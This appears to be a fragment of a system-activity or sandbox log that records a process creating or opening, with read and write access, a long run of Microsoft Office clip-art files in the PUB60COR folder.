Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
